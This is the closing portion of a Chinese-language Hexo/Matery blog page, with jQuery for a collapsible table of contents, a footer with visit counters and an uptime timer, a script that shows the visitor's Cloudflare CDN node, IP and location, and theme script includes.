        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="/about" target="_blank">YangHao</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">26.6k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "08";
                    var startDate = "10";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            

			<br>
			
            <span id="showcdn" style='display:none;'>当前CDN节点: <span id="cdn">【未知】</span>&nbsp;|&nbsp;你的ip: <span id="ip">【未知】</span>&nbsp;|&nbsp;你的所在国家/地区: <span id="loc">【未知】</span></span>
            <script>
                	getCDNinfo = function() {
	$.ajax({
		url: "https://cdnjs.cloudflare.com/cdn-cgi/trace",
		success: function(data, status) {
			let areas = "Antananarivo, Madagascar - (TNR);Cape Town, South Africa - (CPT);Casablanca, Morocco - (CMN);Dar Es Salaam, Tanzania - (DAR);Djibouti City, Djibouti - (JIB);Durban, South Africa - (DUR);Johannesburg, South Africa - (JNB);Kigali, Rwanda - (KGL);Lagos, Nigeria - (LOS);Luanda, Angola - (LAD);Maputo, MZ - (MPM);Mombasa, Kenya - (MBA);Port Louis, Mauritius - (MRU);Réunion, France - (RUN);Bangalore, India - (BLR);Bangkok, Thailand - (BKK);Bandar Seri Begawan, Brunei - (BWN);Cebu, Philippines - (CEB);Chengdu, China - (CTU);Chennai, India - (MAA);Chittagong, Bangladesh - (CGP);Chongqing, China - (CKG);Colombo, Sri Lanka - (CMB);Dhaka, Bangladesh - (DAC);Dongguan, China - (SZX);Foshan, China - (FUO);Fuzhou, China - (FOC);Guangzhou, China - (CAN);Hangzhou, China - (HGH);Hanoi, Vietnam - (HAN);Hengyang, China - (HNY);Ho Chi Minh City, Vietnam - (SGN);Hong Kong - (HKG);Hyderabad, India - (HYD);Islamabad, Pakistan - (ISB);Jakarta, Indonesia - (CGK);Jinan, China - (TNA);Karachi, Pakistan - (KHI);Kathmandu, Nepal - (KTM);Kolkata, India - (CCU);Kuala Lumpur, Malaysia - (KUL);Lahore, Pakistan - (LHE);Langfang, China - (NAY);Luoyang, China - (LYA);Macau - (MFM);Malé, Maldives - (MLE);Manila, Philippines - (MNL);Mumbai, India - (BOM);Nagpur, India - (NAG);Nanning, China - (NNG);New Delhi, India - (DEL);Osaka, Japan - (KIX);Phnom Penh, Cambodia - (PNH);Qingdao, China - (TAO);Seoul, South Korea - (ICN);Shanghai, China - (SHA);Shenyang, China - (SHE);Shijiazhuang, China - (SJW);Singapore, Singapore - (SIN);Suzhou, China - (SZV);Taipei - (TPE);Thimphu, Bhutan - (PBH);Tianjin, China - (TSN);Tokyo, Japan - (NRT);Ulaanbaatar, Mongolia - (ULN);Vientiane, Laos - (VTE);Wuhan, China - (WUH);Wuxi, China - (WUX);Xi'an, China - (XIY);Yerevan, Armenia - (EVN);Zhengzhou, China - (CGO);Zuzhou, China - (CSX);Amsterdam, Netherlands - (AMS);Athens, Greece - (ATH);Barcelona, Spain - (BCN);Belgrade, Serbia - (BEG);Berlin, Germany - (TXL);Brussels, Belgium - (BRU);Bucharest, Romania - (OTP);Budapest, Hungary - (BUD);Chișinău, Moldova - (KIV);Copenhagen, Denmark - (CPH);Cork, Ireland -  (ORK);Dublin, Ireland - (DUB);Düsseldorf, Germany - (DUS);Edinburgh, United Kingdom - (EDI);Frankfurt, Germany - (FRA);Geneva, Switzerland - (GVA);Gothenburg, Sweden - (GOT);Hamburg, Germany - (HAM);Helsinki, Finland - (HEL);Istanbul, Turkey - (IST);Kyiv, Ukraine - (KBP);Lisbon, Portugal - (LIS);London, United Kingdom - (LHR);Luxembourg City, Luxembourg - (LUX);Madrid, Spain - (MAD);Manchester, United Kingdom - (MAN);Marseille, France - (MRS);Milan, Italy - (MXP);Moscow, Russia - (DME);Munich, Germany - (MUC);Nicosia, Cyprus - (LCA);Oslo, Norway - (OSL);Paris, France - (CDG);Prague, Czech Republic - (PRG);Reykjavík, Iceland - (KEF);Riga, Latvia - (RIX);Rome, Italy - (FCO);Saint Petersburg, Russia - (LED);Sofia, Bulgaria - (SOF);Stockholm, Sweden - (ARN);Tallinn, Estonia - (TLL);Thessaloniki, Greece - (SKG);Vienna, Austria - (VIE);Vilnius, Lithuania - (VNO);Warsaw, Poland - (WAW);Zagreb, Croatia - (ZAG);Zürich, Switzerland - (ZRH);Arica, Chile - (ARI);Asunción, Paraguay - (ASU);Bogotá, Colombia - (BOG);Buenos Aires, Argentina - (EZE);Curitiba, Brazil - (CWB);Fortaleza, Brazil - (FOR);Guatemala City, Guatemala - (GUA);Lima, Peru - (LIM);Medellín, Colombia - (MDE);Panama City, Panama - (PTY);Porto Alegre, Brazil - (POA);Quito, Ecuador - (UIO);Rio de Janeiro, Brazil - (GIG);São Paulo, Brazil - (GRU);Santiago, Chile - (SCL);Willemstad, Curaçao - (CUR);St. George's, Grenada - (GND);Amman, Jordan - (AMM);Baghdad, Iraq - (BGW);Baku, Azerbaijan - (GYD);Beirut, Lebanon - (BEY);Doha, Qatar - (DOH);Dubai, United Arab Emirates - (DXB);Kuwait City, Kuwait - (KWI);Manama, Bahrain - (BAH);Muscat, Oman - (MCT);Ramallah - (ZDM);Riyadh, Saudi Arabia - (RUH);Tel Aviv, Israel - (TLV);Ashburn, VA, United States - (IAD);Atlanta, GA, United States - (ATL);Boston, MA, United States - (BOS);Buffalo, NY, United States - (BUF);Calgary, AB, Canada - (YYC);Charlotte, NC, United States - (CLT);Chicago, IL, United States - (ORD);Columbus, OH, United States - (CMH);Dallas, TX, United States - (DFW);Denver, CO, United States - (DEN);Detroit, MI, United States - (DTW);Honolulu, HI, United States - (HNL);Houston, TX, United States - (IAH);Indianapolis, IN, United States - (IND);Jacksonville, FL, United States - (JAX);Kansas City, MO, United States - (MCI);Las Vegas, NV, United States - (LAS);Los Angeles, CA, United States - (LAX);McAllen, TX, United States - (MFE);Memphis, TN, United States - (MEM);Mexico City, Mexico - (MEX);Miami, FL, United States - (MIA);Minneapolis, MN, United States - (MSP);Montgomery, AL, United States - (MGM);Montréal, QC, Canada - (YUL);Nashville, TN, United States - (BNA);Newark, NJ, United States - (EWR);Norfolk, VA, United States - (ORF);Omaha, NE, United States - (OMA);Philadelphia, United States - (PHL);Phoenix, AZ, United States - (PHX);Pittsburgh, PA, United States - (PIT);Port-Au-Prince, Haiti - (PAP);Portland, OR, United States - (PDX);Queretaro, MX, Mexico - (QRO);Richmond, Virginia - (RIC);Sacramento, CA, United States - (SMF);Salt Lake City, UT, United States - (SLC);San Diego, CA, United States - (SAN);San Jose, CA, United States - (SJC);Saskatoon, SK, Canada - (YXE);Seattle, WA, United States - (SEA);St. Louis, MO, United States - (STL);Tampa, FL, United States - (TPA);Toronto, ON, Canada - (YYZ);Vancouver, BC, Canada - (YVR);Tallahassee, FL, United States - (TLH);Winnipeg, MB, Canada - (YWG);Adelaide, SA, Australia - (ADL);Auckland, New Zealand - (AKL);Brisbane, QLD, Australia - (BNE);Melbourne, VIC, Australia - (MEL);Noumea, New caledonia - (NOU);Perth, WA, Australia - (PER);Sydney, NSW, Australia - (SYD)".split(";");
			let area = data.split("colo=")[1].split("\n")[0];
			for (var i = 0; i < areas.length; i++) {
				if (areas[i].indexOf(area) != -1) {
					$("#cdn").text(areas[i]);
					$("#ip").text(data.split("ip=")[1].split("\n")[0]);
					$("#loc").text(data.split("loc=")[1].split("\n")[0]);
					break;
				}
			}
			$("#showcdn").css('display','block');
		}
	})
}
$(document).ready(function() {
	getCDNinfo();
});
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>






    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

	
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/matery.js"></script>


    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
